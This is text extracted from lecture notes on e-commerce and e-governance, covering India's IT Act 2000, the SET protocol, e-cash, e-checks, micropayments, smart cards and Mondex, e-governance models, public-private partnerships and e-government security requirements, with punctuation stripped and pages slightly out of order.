consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
